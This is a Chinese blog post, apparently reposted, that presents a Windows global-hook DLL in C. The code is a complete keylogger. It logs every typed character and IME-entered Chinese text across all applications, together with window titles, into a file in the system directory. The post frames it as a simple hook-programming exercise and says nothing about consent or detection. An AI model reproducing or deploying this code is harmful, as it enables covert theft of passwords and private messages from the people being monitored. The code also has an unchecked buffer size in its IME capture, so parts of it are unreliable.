在我看来,Windows编程中最好玩的一块就是Hook这一块了,其功能之强大我也无法说清。以下是最简单的钩子编写DLL的方法。虽然这样的简单的方法在一些经过加密的程序已经无法成功使用了。但我就只当是温故把他拿出来~~~(记得这个程序当时也参考了好多前辈的东西,现在看来是如此的简单^_^!)
复制内容到剪贴板
代码:
#include "windows.h" #include "imm.h"//一个关于输入法的头文件 #include "stdio.h" //#define HOOK_API __declspec(dllexport) HHOOK g_hHook = NULL; //hook句柄 HINSTANCE g_hHinstance = NULL; //程序句柄 HWND LastFocusWnd = 0;//上一次句柄,必须使全局的 HWND FocusWnd; //当前窗口句柄,必须使全局的 char title[256]; //获得窗口名字 char *ftemp; char temptitle[256]="标题:"; //标题 char t[2]={0,0}; //捕获单个字母 void writefile(char *lpstr) {//保存为文件 FILE* f1; char cmd[256]; GetSystemDirectory(cmd,256); strcat(cmd,"\\hooktxt.txt"); f1=fopen(cmd,"a+"); fwrite(lpstr,strlen(lpstr),1,f1); fclose(f1); } void writtitle() {//保存当前窗口 FocusWnd = GetActiveWindow(); if(LastFocusWnd != FocusWnd) { ftemp="\n======结束============\n"; writefile(ftemp); ftemp="\n======开始============\n"; writefile(ftemp); GetWindowText(FocusWnd, title, 256); //当前窗口标题 LastFocusWnd = FocusWnd; strcat(temptitle,title); strcat(temptitle,"\n"); writefile(temptitle); } } LRESULT CALLBACK MessageProc(int nCode,WPARAM wParam,LPARAM lParam) { PMSG pmsg = (PMSG)lParam; if (nCode == HC_ACTION) { switch (pmsg->message) { case WM_IME_COMPOSITION: { HIMC hIMC; HWND hWnd=pmsg->hwnd; DWORD dwSize; char lpstr[20]; if(pmsg->lParam & GCS_RESULTSTR) { //先获取当前正在输入的窗口的输入法句柄 hIMC = ImmGetContext(hWnd); // 先将ImmGetCompositionString的获取长度设为0来获取字符串大小. dwSize = ImmGetCompositionString(hIMC, GCS_RESULTSTR, NULL, 0); // 缓冲区大小要加上字符串的NULL结束符大小, // 考虑到UNICODE dwSize += sizeof(WCHAR); memset(lpstr, 0, 20); // 再调用一次.ImmGetCompositionString获取字符串 ImmGetCompositionString(hIMC, GCS_RESULTSTR, lpstr, dwSize); //现在lpstr里面即是输入的汉字了。 writtitle(); //保存当前窗口 writefile(lpstr); //保存为文件 ImmReleaseContext(hWnd, hIMC); } } break; case WM_CHAR: //截获发向焦点窗口的键盘消息 { char ch,str[10]; ch=(char)(pmsg->wParam); if (ch>=32 && ch<=126) //可见字符 { writtitle(); t[0]=ch; writefile(t); } if (ch>=8 && ch<=31) //控制字符 { switch(ch) { case 8: strcpy(str,"[Backspace]"); break; case 9: strcpy(str,"[TAB]"); break; case 13: strcpy(str,"[Enter]"); break; default:strcpy(str,"n"); } if (strcmp(str,"n")) { writtitle(); writefile(str); } } } break; } } LRESULT lResult = CallNextHookEx(g_hHook, nCode, wParam, lParam); return(lResult); } //HOOK_API BOOL InstallHook() BOOL InstallHook() { g_hHook = SetWindowsHookEx(WH_GETMESSAGE,(HOOKPROC)MessageProc,g_hHinstance,0); return TRUE; } //HOOK_API BOOL UnHook() BOOL UnHook() { return UnhookWindowsHookEx(g_hHook); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: g_hHinstance=HINSTANCE(hModule); break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; case DLL_PROCESS_DETACH: UnHook(); break; } return TRUE; }
转载于:https://www.cnblogs.com/HappyQQ/archive/2008/01/10/1033758.html
